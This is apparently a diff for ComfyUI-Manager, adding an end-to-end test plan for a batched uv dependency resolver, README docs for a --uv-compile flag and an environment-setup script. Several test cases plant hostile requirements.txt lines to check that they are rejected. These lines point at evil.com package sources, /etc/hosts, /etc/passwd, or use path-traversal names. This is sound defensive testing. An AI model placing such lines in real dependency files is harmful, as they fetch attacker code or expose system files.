**Cleanup**: `rm -rf "$COMFYUI_PATH/custom_nodes/conflict_a" "$COMFYUI_PATH/custom_nodes/conflict_b"`
---
### TC-CLI-5: Dangerous Pattern Skip [P0]
**Steps**:
1. Create a node pack mixing valid and dangerous lines:
```bash
mkdir -p "$COMFYUI_PATH/custom_nodes/test_dangerous"
cat > "$COMFYUI_PATH/custom_nodes/test_dangerous/requirements.txt" << 'EOF'
chardet>=5.0
-r ../../../etc/hosts
--find-links http://evil.com/pkgs
requests>=2.28
EOF
```
2. Run:
```bash
$VENV_PY -m cm_cli uv-compile
```
**Verify**:
- Exit code: 0
- Output contains: `Resolved 2 deps` (chardet + requests, dangerous lines skipped)
- `chardet` and `requests` are importable
- Log contains: `rejected dangerous line` for the `-r` and `--find-links` lines
**Cleanup**: `rm -rf "$COMFYUI_PATH/custom_nodes/test_dangerous"`
---
### TC-CLI-6: install --uv-compile Single Pack [P0]
**Steps**:
1. In clean E2E environment, install a single node pack:
```bash
$VENV_PY -m cm_cli install comfyui-impact-pack --uv-compile --mode remote
```
**Verify**:
- Exit code: 0
- Per-node pip install does NOT run (no `Install: pip packages` in output)
- `install.py` still executes
- Output contains: `Resolved N deps from M source(s)`
- Impact Pack dependencies are importable: `cv2`, `skimage`, `dill`, `scipy`, `matplotlib`
---
### TC-CLI-7: install --uv-compile Multiple Packs [P0]
**Steps**:
1. After TC-CLI-6 (or with impact-pack already installed), install two more packs at once:
```bash
$VENV_PY -m cm_cli install comfyui-impact-subpack comfyui-inspire-pack --uv-compile --mode remote
```
**Verify**:
- Exit code: 0
- Both packs installed: `[INSTALLED] comfyui-impact-subpack`, `[INSTALLED] comfyui-inspire-pack`
- Batch resolution runs once (not twice) after all installs complete
- Resolves deps for **all** installed packs (impact + subpack + inspire + manager)
- New dependencies importable: `cachetools`, `webcolors`, `piexif`
- Previously installed deps (from step 1) remain intact
---
## Test Fixture Setup
Each TC that requires node packs should use isolated, deterministic fixtures:
```bash
# Create test node pack
mkdir -p "$COMFY_ROOT/custom_nodes/test_pack_a"
echo "chardet>=5.0" > "$COMFY_ROOT/custom_nodes/test_pack_a/requirements.txt"
# Cleanup after test
rm -rf "$COMFY_ROOT/custom_nodes/test_pack_a"
```
Ensure no other node packs in `custom_nodes/` interfere with expected counts. Use a clean `custom_nodes/` directory or account for existing packs in assertions.
---
## TC-1: Normal Batch Resolution [P0]
**Precondition**: `use_unified_resolver = true`, uv installed, at least one node pack with `requirements.txt`
**Steps**:
1. Create `$COMFY_ROOT/custom_nodes/test_pack_a/requirements.txt` with content: `chardet>=5.0`
2. Start ComfyUI
**Expected log**:
```
[UnifiedDepResolver] Collected N deps from M sources (skipped 0)
[UnifiedDepResolver] running: ... uv pip compile ...
[UnifiedDepResolver] running: ... uv pip install ...
[UnifiedDepResolver] startup batch resolution succeeded
```
**Verify**: Neither `Install: pip packages for` nor `Install: pip packages` appears in output (both per-node pip variants must be absent)
---
## TC-2: Disabled State (Default) [P1]
**Precondition**: `use_unified_resolver = false` or key absent from config.ini
**Steps**: Start ComfyUI
**Verify**: No `[UnifiedDepResolver]` log output at all
---
## TC-3: Fallback When uv Unavailable [P0]
**Precondition**: `use_unified_resolver = true`, uv completely unavailable
**Steps**:
1. Create a venv **without** uv installed (`uv` package not in venv)
2. Ensure no standalone `uv` binary exists in `$PATH` (rename or use isolated `$PATH`)
3. Start ComfyUI
```bash
# Reliable uv removal: both module and binary must be absent
uv pip uninstall uv
# Verify neither path works
python -m uv --version 2>&1 | grep -q "No module" && echo "module uv: absent"
which uv 2>&1 | grep -q "not found" && echo "binary uv: absent"
```
**Expected log**:
```
[UnifiedDepResolver] uv not available at startup, falling back to per-node pip
```
**Verify**:
- `manager_util.use_unified_resolver` is reset to `False`
- Subsequent node pack installations use per-node pip install normally
---
## TC-4: Fallback on Compile Failure [P0]
**Precondition**: `use_unified_resolver = true`, conflicting dependencies
**Steps**:
1. Node pack A `requirements.txt`: `numpy==1.24.0`
2. Node pack B `requirements.txt`: `numpy==1.26.0`
3. Start ComfyUI
**Expected log**:
```
[UnifiedDepResolver] startup batch failed: compile failed: ..., falling back to per-node pip
```
**Verify**:
- `manager_util.use_unified_resolver` is reset to `False`
- Falls back to per-node pip install normally
---
## TC-5: Fallback on Install Failure [P0]
**Precondition**: `use_unified_resolver = true`, compile succeeds but install fails
**Steps**:
1. Create node pack with `requirements.txt`: `numpy<2`
2. Force install failure by making the venv's `site-packages` read-only:
```bash
chmod -R a-w "$(python -c 'import site; print(site.getsitepackages()[0])')"
```
3. Start ComfyUI
4. After test, restore permissions:
```bash
chmod -R u+w "$(python -c 'import site; print(site.getsitepackages()[0])')"
```
**Expected log**:
```
[UnifiedDepResolver] startup batch failed: ..., falling back to per-node pip
```
> The `...` contains raw stderr from `uv pip install` (e.g., permission denied errors).
**Verify**:
- `manager_util.use_unified_resolver` is reset to `False`
- Falls back to per-node pip install
---
## TC-6: install.py Execution Preserved [P0]
**Precondition**: `use_unified_resolver = true`, ComfyUI running with batch resolution succeeded
**Steps**:
1. While ComfyUI is running, install a node pack that has both `install.py` and `requirements.txt` via API:
```bash
curl -X POST http://localhost:8199/v2/manager/queue/task \
-H "Content-Type: application/json" \
-d '{
"ui_id": "test-installpy",
"client_id": "test-client",
"kind": "install",
"params": {
"id": "<node-pack-id-with-install-py>",
"version": "latest",
"selected_version": "latest",
"mode": "remote",
"channel": "default"
}
}'
```
> Choose a CNR node pack known to have both `install.py` and `requirements.txt`.
> Alternatively, use the Manager UI to install the same pack.
2. Check logs after installation
**Verify**:
- `Install: install script` is printed (install.py runs immediately during install)
- `Install: pip packages` does NOT appear (deps deferred, not installed per-node)
- Log: `[UnifiedDepResolver] deps deferred to startup batch resolution for <path>`
- After **restart**, the new pack's deps are included in batch resolution (`Collected N deps from M sources`)
---
## TC-7: Dangerous Pattern Rejection [P0]
**Precondition**: `use_unified_resolver = true`
**Steps**: Include any of the following in a node pack's `requirements.txt`:
```
-r ../../../etc/hosts
--requirement secret.txt
-e git+https://evil.com/repo
--editable ./local
-c constraint.txt
--constraint external.txt
--find-links http://evil.com/pkgs
-f http://evil.com/pkgs
evil_pkg @ file:///etc/passwd
```
**Expected log**:
```
[UnifiedDepResolver] rejected dangerous line: '...' from <path>
```
**Verify**: Dangerous lines are skipped; remaining valid deps are installed normally
---
## TC-8: Path Separator Rejection [P0]
**Precondition**: `use_unified_resolver = true`
**Steps**: Node pack `requirements.txt`:
```
../evil/pkg
bad\pkg
./local_package
```
**Expected log**:
```
[UnifiedDepResolver] rejected path separator: '...' from <path>
```
**Verify**: Lines with `/` or `\` in the package name portion are rejected; valid deps on other lines are processed normally
---
## TC-9: --index-url / --extra-index-url Separation [P0]
**Precondition**: `use_unified_resolver = true`
Test all four inline forms:
| # | `requirements.txt` content | Expected package | Expected URL |
|---|---------------------------|-----------------|--------------|
| a | `torch --index-url https://example.com/whl` | `torch` | `https://example.com/whl` |
| b | `torch --extra-index-url https://example.com/whl` | `torch` | `https://example.com/whl` |
| c | `--index-url https://example.com/whl` (standalone) | *(none)* | `https://example.com/whl` |
| d | `--extra-index-url https://example.com/whl` (standalone) | *(none)* | `https://example.com/whl` |
**Steps**: Create a node pack with each variant (one at a time or combined with a valid package on a separate line)
**Verify**:
- Package spec is correctly extracted (or empty for standalone lines)
- URL is passed as `--extra-index-url` to `uv pip compile`
- Duplicate URLs across multiple node packs are deduplicated
- Log: `[UnifiedDepResolver] extra-index-url: <url>`
---
## TC-10: Credential Redaction [P0]
**Precondition**: `use_unified_resolver = true`
**Steps**: Node pack `requirements.txt`:
```
private-pkg --index-url https://user:token123@pypi.private.com/simple
```
**Verify**:
- `user:token123` does NOT appear in logs
- Masked as `****@` in log output
---
## TC-11: Disabled Node Packs Excluded [P1]
**Precondition**: `use_unified_resolver = true`
**Steps**: Test both disabled styles:
1. New style: `custom_nodes/.disabled/test_pack/requirements.txt` with content: `numpy`
2. Old style: `custom_nodes/test_pack.disabled/requirements.txt` with content: `requests`
3. Start ComfyUI
**Verify**: Neither disabled node pack's deps are collected (not included in `Collected N`)
---
## TC-12: No Dependencies [P2]
**Precondition**: `use_unified_resolver = true`, only node packs without `requirements.txt`
**Steps**: Start ComfyUI
**Expected log**:
```
[UnifiedDepResolver] No dependencies to resolve
```
**Verify**: Compile/install steps are skipped; startup completes normally
---
## TC-13: Runtime Node Pack Install (Defer Behavior) [P1]
**Precondition**: `use_unified_resolver = true`, batch resolution succeeded at startup
**Steps**:
1. Start ComfyUI and confirm batch resolution succeeds
2. While ComfyUI is running, install a new node pack via API:
```bash
curl -X POST http://localhost:8199/v2/manager/queue/task \
-H "Content-Type: application/json" \
-d '{
"ui_id": "test-defer-1",
"client_id": "test-client",
"kind": "install",
"params": {
"id": "<node-pack-id>",
"version": "latest",
"selected_version": "latest",
"mode": "remote",
"channel": "default"
}
}'
```
> Replace `<node-pack-id>` with a real CNR node pack ID (e.g., from the Manager UI).
> Alternatively, use the Manager UI to install a node pack.
3. Check logs after installation
**Verify**:
- Log: `[UnifiedDepResolver] deps deferred to startup batch resolution for <path>`
- `Install: pip packages` does NOT appear
- After ComfyUI **restart**, the new node pack's deps are included in batch resolution
---
## TC-14: Both Unified Resolver Code Paths [P0]
Verify both code locations that guard per-node pip install behave correctly in unified mode:
| Path | Guard Variable | Trigger | Location |
|------|---------------|---------|----------|
| Runtime install | `manager_util.use_unified_resolver` | API install while ComfyUI is running | `glob/manager_core.py` class method (~line 846) |
| Startup lazy install | `_unified_resolver_succeeded` | Queued install processed at restart | `prestartup_script.py` `execute_lazy_install_script()` (~line 594) |
> **Note**: The standalone `execute_install_script()` in `glob/manager_core.py` (~line 1881) also has a unified resolver guard but is reachable via `update-comfyui`, git-based node pack updates, gitclone operations, CLI, and legacy server paths. The guard is identical to the class method; see [Out of Scope](#out-of-scope-deferred).
**Steps**:
**Path 1 — Runtime API install (class method)**:
```bash
# While ComfyUI is running:
curl -X POST http://localhost:8199/v2/manager/queue/task \
-H "Content-Type: application/json" \
-d '{
"ui_id": "test-path1",
"client_id": "test-client",
"kind": "install",
"params": {
"id": "<node-pack-id>",
"version": "latest",
"selected_version": "latest",
"mode": "remote",
"channel": "default"
}
}'
```
> Choose a CNR node pack that has both `install.py` and `requirements.txt`.
**Path 2 — Startup lazy install (`execute_lazy_install_script`)**:
1. Create a test node pack with both `install.py` and `requirements.txt`:
```bash
mkdir -p "$COMFY_ROOT/custom_nodes/test_pack_lazy"
echo 'print("lazy install.py executed")' > "$COMFY_ROOT/custom_nodes/test_pack_lazy/install.py"
echo "chardet" > "$COMFY_ROOT/custom_nodes/test_pack_lazy/requirements.txt"
```
2. Manually inject a `#LAZY-INSTALL-SCRIPT` entry into `install-scripts.txt`:
```bash
SCRIPTS_DIR="$COMFY_ROOT/user/__manager/startup-scripts"
mkdir -p "$SCRIPTS_DIR"
PYTHON_PATH=$(which python)
echo "['$COMFY_ROOT/custom_nodes/test_pack_lazy', '#LAZY-INSTALL-SCRIPT', '$PYTHON_PATH']" \
>> "$SCRIPTS_DIR/install-scripts.txt"
```
3. Start ComfyUI (with `use_unified_resolver = true`)
**Verify**:
- Path 1: `[UnifiedDepResolver] deps deferred to startup batch resolution for <path>` appears, `install.py` runs immediately, `Install: pip packages` does NOT appear
- Path 2: `lazy install.py executed` is printed (install.py runs at startup), `Install: pip packages for` does NOT appear for the pack (skipped because `_unified_resolver_succeeded` is True after batch resolution)
---
## TC-15: Behavior After Fallback in Same Process [P1]
**Precondition**: Resolver failed at startup (TC-4 or TC-5 scenario)
**Steps**:
1. Set up conflicting deps (as in TC-4) and start ComfyUI (resolver fails, flag reset to `False`)
2. While still running, install a new node pack via API:
```bash
curl -X POST http://localhost:8199/v2/manager/queue/task \
-H "Content-Type: application/json" \
-d '{
"ui_id": "test-postfallback",
"client_id": "test-client",
"kind": "install",
"params": {
"id": "<node-pack-id>",
"version": "latest",
"selected_version": "latest",
"mode": "remote",
"channel": "default"
}
}'
```
**Verify**:
- New node pack uses per-node pip install (not deferred)
- `Install: pip packages` appears normally
- On next restart with conflicts resolved, unified resolver retries if config still `true`
---
## TC-16: Generic Exception Fallback [P1]
**Precondition**: `use_unified_resolver = true`, an exception escapes before `resolve_and_install()`
This covers the `except Exception` handler at `prestartup_script.py` (~line 793), distinct from `UvNotAvailableError` (TC-3) and `ResolveResult` failure (TC-4/TC-5). The generic handler catches errors in the import, `collect_node_pack_paths()`, `collect_base_requirements()`, or `UnifiedDepResolver.__init__()` — all of which run before the resolver's own internal error handling.
**Steps**:
1. Make the `custom_nodes` directory unreadable so `collect_node_pack_paths()` raises a `PermissionError`:
```bash
chmod a-r "$COMFY_ROOT/custom_nodes"
```
2. Start ComfyUI
3. After test, restore permissions:
```bash
chmod u+r "$COMFY_ROOT/custom_nodes"
```
**Expected log**:
```
[UnifiedDepResolver] startup error: ..., falling back to per-node pip
```
**Verify**:
- `manager_util.use_unified_resolver` is reset to `False`
- Falls back to per-node pip install normally
- Log pattern is `startup error:` (NOT `startup batch failed:` nor `uv not available`)
---
## TC-17: Restart Dependency Detection [P0]
**Precondition**: `use_unified_resolver = true`, automated E2E scripts available
This test verifies that the resolver correctly detects and installs dependencies for node packs added between restarts, incrementally building the dependency set.
**Steps**:
1. Boot ComfyUI with no custom node packs (Boot 1 — baseline)
2. Verify baseline deps only (Manager's own deps)
3. Stop ComfyUI
4. Clone `ComfyUI-Impact-Pack` into `custom_nodes/`
5. Restart ComfyUI (Boot 2)
6. Verify Impact Pack deps are installed (`cv2`, `skimage`, `dill`, `scipy`, `matplotlib`)
7. Stop ComfyUI
8. Clone `ComfyUI-Inspire-Pack` into `custom_nodes/`
9. Restart ComfyUI (Boot 3)
10. Verify Inspire Pack deps are installed (`cachetools`, `webcolors`)
**Expected log (each boot)**:
```
[UnifiedDepResolver] Collected N deps from M sources (skipped S)
[UnifiedDepResolver] running: ... uv pip compile ...
[UnifiedDepResolver] running: ... uv pip install ...
[UnifiedDepResolver] startup batch resolution succeeded
```
**Verify**:
- Boot 1: ~10 deps from ~10 sources; `cv2`, `dill`, `cachetools` are NOT installed
- Boot 2: ~19 deps from ~18 sources; `cv2`, `skimage`, `dill`, `scipy`, `matplotlib` all importable
- Boot 3: ~24 deps from ~21 sources; `cachetools`, `webcolors` also importable
- Both packs show as loaded in logs
**Automation**: Use `tests/e2e/scripts/` (setup → start → stop) with node pack cloning between boots.
---
## TC-18: Real Node Pack Integration [P0]
**Precondition**: `use_unified_resolver = true`, network access to GitHub + PyPI
Full pipeline test with real-world node packs (`ComfyUI-Impact-Pack` + `ComfyUI-Inspire-Pack`) to verify the resolver handles production requirements.txt files correctly.
**Steps**:
1. Set up E2E environment
2. Clone both Impact Pack and Inspire Pack into `custom_nodes/`
3. Direct-mode: instantiate `UnifiedDepResolver`, call `collect_requirements()` and `resolve_and_install()`
4. Boot-mode: start ComfyUI and verify via logs
**Expected behavior (direct mode)**:
```
--- Discovered node packs (3) --- # Manager, Impact, Inspire
ComfyUI-Impact-Pack
ComfyUI-Inspire-Pack
ComfyUI-Manager
--- Phase 1: Collect Requirements ---
Total requirements: ~24
Skipped: 1 # SAM2 git+https:// URL
Extra index URLs: set()
```
**Verify**:
- `git+https://github.com/facebookresearch/sam2.git` is correctly rejected with "rejected path separator"
- All other dependencies are collected and resolved
- After install, `cv2`, `PIL`, `scipy`, `skimage`, `matplotlib` are all importable
- No conflicting version errors during compile
**Automation**: Use `tests/e2e/scripts/` (setup → clone packs → start) with direct-mode resolver invocation.
---
## Validated Behaviors (from E2E Testing)
The following behaviors were confirmed during manual E2E testing:
### Resolver Pipeline
- **3-phase pipeline**: Collect → `uv pip compile``uv pip install` works end-to-end
- **Incremental detection**: Resolver discovers new node packs on each restart without reinstalling existing deps
- **Dependency deduplication**: Overlapping deps from multiple packs are resolved to compatible versions
### Security & Filtering
- **`git+https://` rejection**: URLs like `git+https://github.com/facebookresearch/sam2.git` are rejected with "rejected path separator" — SAM2 is the only dependency skipped from Impact Pack
- **Blacklist filtering**: `PackageRequirement` objects have `.name`, `.spec`, `.source` attributes; `collected.skipped` returns `[(spec_string, reason_string)]` tuples
### Manager Integration
- **Manager v4 endpoints**: All endpoints use `/v2/` prefix (e.g., `/v2/manager/queue/status`)
- **`Blocked by policy`**: Expected when Manager is pip-installed and also symlinked in `custom_nodes/`; prevents legacy double-loading
- **config.ini path**: Must be at `$COMFY_ROOT/user/__manager/config.ini`, not in the symlinked Manager dir
### Environment
- **PYTHONPATH requirement**: `comfy` is a local package (not pip-installed); `comfyui_manager` imports from `comfy`, so both require `PYTHONPATH=$COMFY_ROOT`
- **HOME isolation**: `HOME=$E2E_ROOT/home` prevents host config contamination during boot
---
## Summary
| TC | P | Scenario | Key Verification |
|----|---|----------|------------------|
| 1 | P0 | Normal batch resolution | compile → install pipeline |
| 2 | P1 | Disabled state | No impact on existing behavior |
| 3 | P0 | uv unavailable fallback | Flag reset + per-node resume |
| 4 | P0 | Compile failure fallback | Flag reset + per-node resume |
| 5 | P0 | Install failure fallback | Flag reset + per-node resume |
| 6 | P0 | install.py preserved | deps defer, install.py immediate |
| 7 | P0 | Dangerous pattern rejection | Security filtering |
| 8 | P0 | Path separator rejection | `/` and `\` in package names |
| 9 | P0 | index-url separation | All 4 variants + dedup |
| 10 | P0 | Credential redaction | Log security |
| 11 | P1 | Disabled packs excluded | Both `.disabled/` and `.disabled` suffix |
| 12 | P2 | No dependencies | Empty pipeline |
| 13 | P1 | Runtime install defer | Defer until restart |
| 14 | P0 | Both unified resolver paths | runtime API (class method) + startup lazy install |
| 15 | P1 | Post-fallback behavior | Per-node pip resumes in same process |
| 16 | P1 | Generic exception fallback | Distinct from uv-absent and batch-failed |
| 17 | P0 | Restart dependency detection | Incremental node pack discovery across restarts |
| 18 | P0 | Real node pack integration | Impact + Inspire Pack full pipeline |
| CLI-1 | P0 | CLI normal batch resolution | exit 0, deps installed |
| CLI-2 | P1 | CLI no custom nodes | exit 0, graceful empty |
| CLI-3 | P0 | CLI uv unavailable | exit 1, error message |
| CLI-4 | P0 | CLI conflicting deps | exit 1, resolution failed |
| CLI-5 | P0 | CLI dangerous pattern skip | exit 0, dangerous skipped |
| CLI-6 | P0 | install --uv-compile single | per-node pip skipped, batch resolve |
| CLI-7 | P0 | install --uv-compile multi | batch once after all installs |
### Traceability
| Feature Requirement | Test Cases |
|---------------------|------------|
| FR-1: Dependency collection | TC-1, TC-11, TC-12 |
| FR-2: Input sanitization | TC-7, TC-8, TC-10 |
| FR-3: Index URL handling | TC-9 |
| FR-4: Batch resolution (compile) | TC-1, TC-4 |
| FR-5: Batch install | TC-1, TC-5 |
| FR-6: install.py preserved | TC-6, TC-14 |
| FR-7: Startup batch integration | TC-1, TC-2, TC-3 |
| Fallback behavior | TC-3, TC-4, TC-5, TC-15, TC-16 |
| Disabled node pack exclusion | TC-11 |
| Runtime defer behavior | TC-13, TC-14 |
| FR-8: Restart discovery | TC-17 |
| FR-9: Real-world compatibility | TC-17, TC-18 |
| FR-2: Input sanitization (git URLs) | TC-8, TC-18 |
| FR-10: CLI batch resolution | TC-CLI-1, TC-CLI-2, TC-CLI-3, TC-CLI-4, TC-CLI-5 |
| FR-11: CLI install --uv-compile | TC-CLI-6, TC-CLI-7 |

View File

@ -11,11 +11,15 @@ cm-cli [OPTIONS]
OPTIONS:
[install|reinstall|uninstall|update|disable|enable|fix] node_name ... ?[--channel <channel name>] ?[--mode [remote|local|cache]]
[install|reinstall|update|fix] node_name ... ?[--uv-compile]
[update|disable|enable|fix] all ?[--channel <channel name>] ?[--mode [remote|local|cache]]
[update|fix] all ?[--uv-compile]
[simple-show|show] [installed|enabled|not-installed|disabled|all|snapshot|snapshot-list] ?[--channel <channel name>] ?[--mode [remote|local|cache]]
save-snapshot ?[--output <snapshot .json/.yaml>]
restore-snapshot <snapshot .json/.yaml> ?[--pip-non-url] ?[--pip-non-local-url] ?[--pip-local-url]
restore-dependencies
restore-snapshot <snapshot .json/.yaml> ?[--pip-non-url] ?[--pip-non-local-url] ?[--pip-local-url] ?[--uv-compile]
restore-dependencies ?[--uv-compile]
install-deps <deps.json> ?[--channel <channel name>] ?[--mode [remote|local|cache]] ?[--uv-compile]
uv-compile
clear
```
@ -107,6 +111,22 @@ ComfyUI-Loopchain
* `enable`: Enables the specified custom nodes.
* `fix`: Attempts to fix dependencies for the specified custom nodes.
#### `--uv-compile` flag (`install`, `reinstall`, `update`, `fix`)
When `--uv-compile` is specified, per-node pip installs are skipped during node operations.
After all operations complete, `uv pip compile` resolves the full dependency graph in one batch.
* Requires `uv` to be installed.
* Prevents dependency conflicts between multiple node packs.
* On resolution failure, displays conflicting packages and which node packs requested them.
* `reinstall --uv-compile` is mutually exclusive with `--no-deps`.
```bash
cm-cli install ComfyUI-Impact-Pack ComfyUI-Inspire-Pack --uv-compile
cm-cli update all --uv-compile
cm-cli fix ComfyUI-Impact-Pack --uv-compile
```
### 4. Snapshot Management
* `cm-cli save-snapshot [--output <snapshot .json/.yaml>]`: Saves the current snapshot.
@ -122,12 +142,33 @@ ComfyUI-Loopchain
### 5. Dependency Restoration
`restore-dependencies`
`restore-dependencies ?[--uv-compile]`
* This command can be used if custom nodes are installed under the `ComfyUI/custom_nodes` path but their dependencies are not installed.
* It is useful when starting a new cloud instance, like Colab, where dependencies need to be reinstalled and installation scripts re-executed.
* It can also be utilized if ComfyUI is reinstalled and only the custom_nodes path has been backed up and restored.
* Use `--uv-compile` to skip per-node pip installs and resolve all dependencies in one batch instead.
### 6. Clear
### 6. Install from Dependency File
`install-deps <deps.json> ?[--channel <channel name>] ?[--mode [remote|local|cache]] ?[--uv-compile]`
* Installs custom nodes specified in a dependency spec file (`.json`) or workflow file (`.png`/`.json`).
* Use `--uv-compile` to batch-resolve all dependencies after installation instead of per-node pip.
### 7. uv-compile
`uv-compile ?[--user-directory <path>]`
* Batch-resolves and installs all custom node pack dependencies using `uv pip compile`.
* Useful for environment recovery or initial setup without starting ComfyUI.
* Requires `uv` to be installed.
```bash
cm-cli uv-compile
cm-cli uv-compile --user-directory /path/to/comfyui
```
### 8. Clear
In the GUI, installations, updates, or snapshot restorations are scheduled to execute the next time ComfyUI is launched. The `clear` command clears this scheduled state, ensuring no pre-execution actions are applied.

View File

@ -11,11 +11,15 @@ cm-cli [OPTIONS]
OPTIONS:
[install|reinstall|uninstall|update|disable|enable|fix] node_name ... ?[--channel <channel name>] ?[--mode [remote|local|cache]]
[install|reinstall|update|fix] node_name ... ?[--uv-compile]
[update|disable|enable|fix] all ?[--channel <channel name>] ?[--mode [remote|local|cache]]
[update|fix] all ?[--uv-compile]
[simple-show|show] [installed|enabled|not-installed|disabled|all|snapshot|snapshot-list] ?[--channel <channel name>] ?[--mode [remote|local|cache]]
save-snapshot ?[--output <snapshot .json/.yaml>]
restore-snapshot <snapshot .json/.yaml> ?[--pip-non-url] ?[--pip-non-local-url] ?[--pip-local-url]
restore-dependencies
restore-snapshot <snapshot .json/.yaml> ?[--pip-non-url] ?[--pip-non-local-url] ?[--pip-local-url] ?[--uv-compile]
restore-dependencies ?[--uv-compile]
install-deps <deps.json> ?[--channel <channel name>] ?[--mode [remote|local|cache]] ?[--uv-compile]
uv-compile
clear
```
@ -108,6 +112,21 @@ ComfyUI-Loopchain
* `enable`: 지정된 커스텀 노드들을 활성화합니다.
* `fix`: 지정된 커스텀 노드의 의존성을 고치기 위한 시도를 합니다.
#### `--uv-compile` 플래그 (`install`, `reinstall`, `update`, `fix`)
`--uv-compile` 플래그를 사용하면 노드별 pip 설치를 건너뛰고, 모든 작업이 완료된 후 `uv pip compile`로 전체 의존성을 한 번에 일괄 해결합니다.
* `uv`가 설치된 환경에서만 동작합니다.
* 여러 노드 팩 간의 의존성 충돌을 방지합니다.
* 해결 실패 시 충돌 패키지와 해당 패키지를 요청한 노드 팩 목록을 표시합니다.
* `reinstall --uv-compile``--no-deps`와 동시에 사용할 수 없습니다.
```bash
cm-cli install ComfyUI-Impact-Pack ComfyUI-Inspire-Pack --uv-compile
cm-cli update all --uv-compile
cm-cli fix ComfyUI-Impact-Pack --uv-compile
```
### 4. 스냅샷 관리 기능
* `cm-cli save-snapshot ?[--output <snapshot .json/.yaml>]`: 현재의 snapshot을 저장합니다.
@ -123,13 +142,33 @@ ComfyUI-Loopchain
### 5. 의존성 설치
`restore-dependencies`
`restore-dependencies ?[--uv-compile]`
* `ComfyUI/custom_nodes` 하위 경로에 커스텀 노드들이 설치되어 있긴 하지만, 의존성이 설치되지 않은 경우 사용할 수 있습니다.
* Colab과 같이 cloud instance를 새로 시작하는 경우 의존성 재설치 및 설치 스크립트가 재실행되어야 하는 경우 사용합니다.
* ComfyUI를 재설치할 경우, custom_nodes 경로만 백업했다가 재설치할 경우 활용 가능합니다.
* `--uv-compile` 플래그를 사용하면 노드별 pip 설치를 건너뛰고 일괄 해결합니다.
### 6. 의존성 파일로 설치
### 6. clear
`install-deps <deps.json> ?[--channel <channel name>] ?[--mode [remote|local|cache]] ?[--uv-compile]`
* 의존성 spec 파일(`.json`) 또는 워크플로우 파일(`.png`/`.json`)에 명시된 커스텀 노드를 설치합니다.
* `--uv-compile` 플래그를 사용하면 모든 노드 설치 후 일괄 의존성 해결을 수행합니다.
### 7. uv-compile
`uv-compile ?[--user-directory <path>]`
* 설치된 모든 커스텀 노드 팩의 의존성을 `uv pip compile`로 일괄 해결하고 설치합니다.
* ComfyUI를 재시작하지 않고 의존성 환경을 복구하거나 초기 설정 시 활용할 수 있습니다.
* `uv`가 설치된 환경에서만 동작합니다.
```bash
cm-cli uv-compile
cm-cli uv-compile --user-directory /path/to/comfyui
```
### 8. clear
GUI에서 install, update를 하거나 snapshot을 restore하는 경우 예약을 통해서 다음번 ComfyUI를 실행할 경우 실행되는 구조입니다. `clear` 는 이런 예약 상태를 clear해서, 아무런 사전 실행이 적용되지 않도록 합니다.

View File

@ -5,7 +5,7 @@ build-backend = "setuptools.build_meta"
[project]
name = "comfyui-manager"
license = { text = "GPL-3.0-only" }
version = "4.1b1"
version = "4.1b3"
requires-python = ">= 3.9"
description = "ComfyUI-Manager provides features to install and manage custom nodes for ComfyUI, as well as various functionalities to assist with ComfyUI."
readme = "README.md"

View File

@ -0,0 +1,241 @@
#!/usr/bin/env bash
# setup_e2e_env.sh — Automated E2E environment setup for ComfyUI + Manager
#
# Creates an isolated ComfyUI installation with ComfyUI-Manager for E2E testing.
# Idempotent: skips setup if marker file and key artifacts already exist.
#
# Input env vars:
# E2E_ROOT — target directory (default: auto-generated via mktemp)
# MANAGER_ROOT — manager repo root (default: auto-detected from script location)
# COMFYUI_BRANCH — ComfyUI branch to clone (default: master)
# PYTHON — Python executable (default: python3)
#
# Output (last line of stdout):
# E2E_ROOT=/path/to/environment
#
# Exit: 0=success, 1=failure
set -euo pipefail
# --- Constants ---
COMFYUI_REPO="https://github.com/comfyanonymous/ComfyUI.git"
PYTORCH_CPU_INDEX="https://download.pytorch.org/whl/cpu"
CONFIG_INI_CONTENT="[default]
use_uv = true
use_unified_resolver = true
file_logging = false"
# --- Logging helpers ---
log() { echo "[setup_e2e] $*"; }
err() { echo "[setup_e2e] ERROR: $*" >&2; }
die() { err "$@"; exit 1; }
# --- Detect manager root by walking up from script dir to find pyproject.toml ---
detect_manager_root() {
local dir
dir="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
while [[ "$dir" != "/" ]]; do
if [[ -f "$dir/pyproject.toml" ]]; then
echo "$dir"
return 0
fi
dir="$(dirname "$dir")"
done
return 1
}
# --- Validate prerequisites ---
validate_prerequisites() {
local py="${PYTHON:-python3}"
local missing=()
command -v git >/dev/null 2>&1 || missing+=("git")
command -v uv >/dev/null 2>&1 || missing+=("uv")
command -v "$py" >/dev/null 2>&1 || missing+=("$py")
if [[ ${#missing[@]} -gt 0 ]]; then
die "Missing prerequisites: ${missing[*]}"
fi
# Verify Python version >= 3.9
local py_version
py_version=$("$py" -c "import sys; print(f'{sys.version_info.major}.{sys.version_info.minor}')")
local major minor
major="${py_version%%.*}"
minor="${py_version##*.}"
if [[ "$major" -lt 3 ]] || { [[ "$major" -eq 3 ]] && [[ "$minor" -lt 9 ]]; }; then
die "Python 3.9+ required, found $py_version"
fi
log "Prerequisites OK (python=$py_version, git=$(git --version | awk '{print $3}'), uv=$(uv --version 2>&1 | awk '{print $2}'))"
}
# --- Check idempotency: skip if already set up ---
check_already_setup() {
local root="$1"
if [[ -f "$root/.e2e_setup_complete" ]] \
&& [[ -d "$root/comfyui" ]] \
&& [[ -d "$root/venv" ]] \
&& [[ -f "$root/comfyui/user/__manager/config.ini" ]] \
&& [[ -L "$root/comfyui/custom_nodes/ComfyUI-Manager" ]]; then
log "Environment already set up at $root (marker file exists). Skipping."
echo "E2E_ROOT=$root"
exit 0
fi
}
# --- Verify the setup ---
verify_setup() {
local root="$1"
local manager_root="$2"
local venv_py="$root/venv/bin/python"
local errors=0
log "Running verification checks..."
# Check ComfyUI directory
if [[ ! -f "$root/comfyui/main.py" ]]; then
err "Verification FAIL: comfyui/main.py not found"
((errors++))
fi
# Check venv python
if [[ ! -x "$venv_py" ]]; then
err "Verification FAIL: venv python not executable"
((errors++))
fi
# Check symlink
local link_target="$root/comfyui/custom_nodes/ComfyUI-Manager"
if [[ ! -L "$link_target" ]]; then
err "Verification FAIL: symlink $link_target does not exist"
((errors++))
elif [[ "$(readlink -f "$link_target")" != "$(readlink -f "$manager_root")" ]]; then
err "Verification FAIL: symlink target mismatch"
((errors++))
fi
# Check config.ini
if [[ ! -f "$root/comfyui/user/__manager/config.ini" ]]; then
err "Verification FAIL: config.ini not found"
((errors++))
fi
# Check Python imports
# comfy is a local package inside ComfyUI (not pip-installed), and
